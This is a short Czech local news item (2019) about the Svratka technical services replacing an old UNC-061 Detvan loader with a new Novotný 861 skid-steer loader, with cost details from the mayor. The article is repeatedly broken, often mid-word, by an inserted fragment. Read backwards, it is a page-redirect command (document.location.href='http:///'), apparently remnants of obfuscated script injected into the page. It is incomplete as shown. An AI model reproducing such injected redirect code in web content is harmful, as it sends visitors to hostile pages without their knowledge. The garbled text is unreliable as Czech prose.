Rainbow page separator

Technickým službám přibyl nový nakladač, starý stroj dosloužil

Středa, 27. března 2019

Svratka / Nový přírůstek do městského au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toparku mají technické služby ve Svratce.
„Kolový nakladač a bagr, také zvaný Bobek – tedy UNC-061 Detvan – po třiadvacetileté službě odjel do zaslouženého důchodu. Nahradil ho nový, výkonnější a úspornější stroj, smykem řízený nakladač Novotný 861. Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to český výrobek vysoké kvality s výbornými technickými parametry a nízkými cenami servisních prací. Veškerá přídavná zařízení se zároveň dají použít ze starého Bobka,“ popsal svratecký starosta František Mládek.
Po odečtení slevy ve výši 60 tisíc korun a ještě 150 tisíc za odprodej starého „uencéčka“ svratecká radnice na nový stroj
vynaložila finanční částku ve výši 650 tisíc plus DPH. „Byla [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to opět trošku neplánovaná investice, ale bez [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to užitečného pracanta bychom se v létě, na[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tož v zimě – takřka každý den v akci – v našich technických službách skutečně neobešli,“ doplnil starosta.